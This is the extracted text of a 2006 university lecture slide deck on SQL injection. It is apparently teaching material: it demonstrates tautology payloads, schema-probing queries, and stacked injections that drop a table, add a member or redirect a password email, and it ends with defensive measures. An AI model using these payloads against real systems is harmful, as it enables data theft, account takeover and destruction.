sql injection attack - syracuse university · 2006-09-27 · sql injection attack modus operandi......

SQL Injection AttackModus operandi. . .

Sridhar.V.Iyer

[email protected]

Department of Computer & Informations Sciences

Syracuse University, Syracuse, NY-13210

SQL Injection Attack – p. 1

SQLWhat is SQL?


SQLWhat is SQL?

Where is it used?


SQLWhat is SQL?

Where is it used?

Why do we use it?


Web Technologies

Platform: Linux, OpenBSD, FreeBSD, Solarisand . . . Windows.


Web Technologies


Web Servers: Apache, LightTPD, Yaws, Tux,IIS


Web Technologies



Databases: MySQL, PostgreSQL, Firebird,MSSQL server


Web Technologies




Scripting Languages: Php, CGI/Perl,SmallTalk, ASP.NET


Web Technologies




Scripting Languages: Php, CGI/Perl,SmallTalk, ASP.NET

Other Alternatives: J2EE/JSP etc.


Modus Operandi...Steve Friedl’s way

Know your enemy



Know your enemy

Find his/her weakness



Know your enemy

Find his/her weakness

Attack his/her weakness


Anatomy of theAttack

The constructed SQL should be like

SELECT list FROM table WHERE field=’$EMAIL’;





What if I give my own email and complete the

query for form?

SELECT list FROM table WHERE field=’[email protected]’’;





What if I give my own email and complete the

query for form?

SELECT list FROM table WHERE field=’[email protected]’’;

What is the output?


Lets dig deeper. . .

Lets create a valid query

SELECT list FROM table WHERE field=’something’ or ’x’=’x’;


Lets dig deeper. . .

Lets create a valid query

SELECT list FROM table WHERE field=’something’ or ’x’=’x’;

Result?Your login information has been mailed to

[email protected]

Dont recognize that email address

Server error!!


Lets behaveourselves

Schema field mapping: Figure out the

tentative field list

SELECT list FROM table WHERE field=’x’ AND email IS NULL;–’;






Find out as many fields as possible in a

similar fashion.






Find out as many fields as possible in a

similar fashion.

Find out the table name. How?



We can try the query SELECT COUNT(*) FROM tablename;

SELECT . . . email=’x’ AND 1=(SELECT COUNT(*) FROM tablename);–’;





Again educated guess is required. The sites

wont have cryptic table names.





Again educated guess is required. The sites

wont have cryptic table names.

Are we interested in this table?SELECT list FROM table WHERE field=’x’ AND members.email IS NULL;–’;


If the databasewasn’t readonly??

Bazoooooka

SELECT . . . =’x’; DROP TABLE members;–’;



Bazoooooka


Add a new member

SELECT . . . =’x’; INSERT INTO members{. . . } VALUES {. . . };–’;



Bazoooooka


Add a new member

SELECT . . . =’x’; INSERT INTO members{. . . } VALUES {. . . };–’;

Mail me the passwordSELECT . . . =’x’; UPDATE members

SET [email protected] WHERE [email protected]’;


Other MethodsUse xp_cmdshell: Something like Macro forMS Word

Map Database structure: Do more of the stuffwe already discussed for just one form


Time for some actionhttp://128.230.212.170/apache2-default/login.php


http://128.230.212.170/apache2-default/login.php

How not to do thewrong thing

Sanitize the Input



Sanitize the Input

Quotesafe the Input



Sanitize the Input

Quotesafe the Input

Use bounded parameters



Sanitize the Input

Quotesafe the Input


Limit Database Permission and segregateusers



Sanitize the Input

Quotesafe the Input



Use Stored procedures for database access



Sanitize the Input

Quotesafe the Input




Isolate the Webserver



Sanitize the Input

Quotesafe the Input




Isolate the Webserver

Configure Error Reporting


DISCLAIMERAny actual or imagined resemblance to ourfar more civilized world today is unintentionaland purely coincidental

The purpose of this presentation is purelyeducational


Referencehttp://www.unixwiz.net/techtips/sql-injection.html

Php Manual.

MySQL Manual.

Google. . . ofcourse.

This site has been created using prosperpackage on LATEX


ThanksQuestions?


sql injection attack - syracuse university · 2006-09-27 · sql injection attack modus operandi......

Documents